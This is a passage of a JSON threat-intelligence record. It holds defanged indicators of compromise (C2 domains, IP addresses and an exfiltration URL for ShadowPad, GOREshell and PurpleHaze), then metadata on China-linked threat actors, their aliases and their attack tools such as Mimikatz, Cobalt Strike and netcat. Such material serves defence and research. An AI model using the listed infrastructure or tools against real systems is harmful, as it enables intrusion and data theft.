server\r\ndscriy.chtq[.]net ShadowPad C2 server\r\nepp.navy[.]ddns[.]info GOREshell C2 server\r\nmail.ccna[.]organiccrap[.]com GOREshell C2 server\r\nmail.secmailbox[.]us Suspected PurpleHaze infrastructure\r\nnetwork.oossafe[.]com Suspected ShadowPad C2 server\r\nnews.imaginerjp[.]com ShadowPad C2 server\r\nnotes.oossafe[.]com Suspected ShadowPad C2 server\r\nsecmailbox[.]us Suspected PurpleHaze infrastructure\r\nsentinelxdr[.]us Suspected PurpleHaze infrastructure\r\ntatacom.duckdns[.]org C2 server\r\ntrendav[.]vip Suspected PurpleHaze infrastructure\r\nupdata.dsqurey[.]com ShadowPad C2 server\r\nIP Addresses\r\nValue Note\r\n103.248.61[.]36 Malware hosting location\r\n107.173.111[.]26 GOREshell C2 server\r\n128.199.124[.]136 C2 server\r\n142.93.212[.]42 Suspected PurpleHaze infrastructure\r\n142.93.214[.]219 GOREshell C2 server\r\n143.244.137[.]54 Suspected PurpleHaze infrastructure\r\n45.13.199[.]209 Exfiltration IP address\r\n65.38.120[.]110 ShadowPad C2 server\r\nURLs\r\nValue Note\r\nhttps[://]45.13.199[.]209/rss/rss.php Exfiltration URL\r\nSource: https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/"
	],
	"report_names": [
		"follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets"
	],
	"threat_actors": [
		{
			"id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e",
			"created_at": "2022-10-25T15:50:23.453824Z",
			"updated_at": "2026-04-10T02:00:05.28793Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"Ke3chang",
				"APT15",
				"Vixen Panda",
				"GREF",
				"Playful Dragon",
				"RoyalAPT",
				"Nylon Typhoon"
			],
			"source_name": "MITRE:Ke3chang",
			"tools": [
				"Okrum",
				"Systeminfo",
				"netstat",
				"spwebmember",
				"Mimikatz",
				"Tasklist",
				"MirageFox",
				"Neoichor",
				"ipconfig"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5339d7c-473e-4b49-b44c-189b4f72b585",
			"created_at": "2024-12-28T02:01:54.8259Z",
			"updated_at": "2026-04-10T02:00:04.778045Z",
			"deleted_at": null,
			"main_name": "Mysterious Elephant",
			"aliases": [
				"APT-K-47"
			],
			"source_name": "ETDA:Mysterious Elephant",
			"tools": [
				"ORPCBackdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0ae281f0-886a-46ab-b413-e2db5c0f3142",
			"created_at": "2025-05-29T02:00:03.217545Z",
			"updated_at": "2026-04-10T02:00:03.869082Z",
			"deleted_at": null,
			"main_name": "PurpleHaze",
			"aliases": [],
			"source_name": "MISPGALAXY:PurpleHaze",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7d5531e2-0ad1-4237-beed-af009035576f",
			"created_at": "2024-05-01T02:03:07.977868Z",
			"updated_at": "2026-04-10T02:00:03.817883Z",
			"deleted_at": null,
			"main_name": "BRONZE PALACE",
			"aliases": [
				"APT15 ",
				"BRONZE DAVENPORT ",
				"BRONZE IDLEWOOD ",
				"CTG-6119 ",
				"CTG-6119 ",
				"CTG-9246 ",
				"Ke3chang ",
				"NICKEL ",
				"Nylon Typhoon ",
				"Playful Dragon",
				"Vixen Panda "
			],
			"source_name": "Secureworks:BRONZE PALACE",
			"tools": [
				"BMW",
				"BS2005",
				"Enfal",
				"Mirage",
				"RoyalCLI",
				"RoyalDNS"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7c8cf02c-623a-4793-918b-f908675a1aef",
			"created_at": "2023-01-06T13:46:38.309165Z",
			"updated_at": "2026-04-10T02:00:02.921721Z",
			"deleted_at": null,
			"main_name": "APT15",
			"aliases": [
				"Metushy",
				"Lurid",
				"Social Network Team",
				"Royal APT",
				"BRONZE DAVENPORT",
				"BRONZE IDLEWOOD",
				"VIXEN PANDA",
				"Ke3Chang",
				"Playful Dragon",
				"BRONZE PALACE",
				"G0004",
				"Red Vulture",
				"Nylon Typhoon"
			],
			"source_name": "MISPGALAXY:APT15",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c",
			"created_at": "2022-10-25T16:07:23.750796Z",
			"updated_at": "2026-04-10T02:00:04.736762Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"APT 15",
				"BackdoorDiplomacy",
				"Bronze Davenport",
				"Bronze Idlewood",
				"Bronze Palace",
				"CTG-9246",
				"G0004",
				"G0135",
				"GREF",
				"Ke3chang",
				"Metushy",
				"Nylon Typhoon",
				"Operation Ke3chang",
				"Operation MirageFox",
				"Playful Dragon",
				"Playful Taurus",
				"PurpleHaze",
				"Red Vulture",
				"Royal APT",
				"Social Network Team",
				"Vixen Panda"
			],
			"source_name": "ETDA:Ke3chang",
			"tools": [
				"Agentemis",
				"Anserin",
				"BS2005",
				"BleDoor",
				"CarbonSteal",
				"Cobalt Strike",
				"CobaltStrike",
				"DarthPusher",
				"DoubleAgent",
				"EternalBlue",
				"GoldenEagle",
				"Graphican",
				"HenBox",
				"HighNoon",
				"IRAFAU",
				"Ketrican",
				"Ketrum",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MS Exchange Tool",
				"Mebroot",
				"Mimikatz",
				"MirageFox",
				"NBTscan",
				"Okrum",
				"PluginPhantom",
				"PortQry",
				"ProcDump",
				"PsList",
				"Quarian",
				"RbDoor",
				"RibDoor",
				"Royal DNS",
				"RoyalCli",
				"RoyalDNS",
				"SAMRID",
				"SMBTouch",
				"SilkBean",
				"Sinowal",
				"SpyWaller",
				"Theola",
				"TidePool",
				"Torpig",
				"Turian",
				"Winnti",
				"XSLCmd",
				"cobeacon",
				"nbtscan",
				"netcat",
				"spwebmember"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434004,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.pdf",
		"text": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.txt",
		"img": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.jpg"
	}
}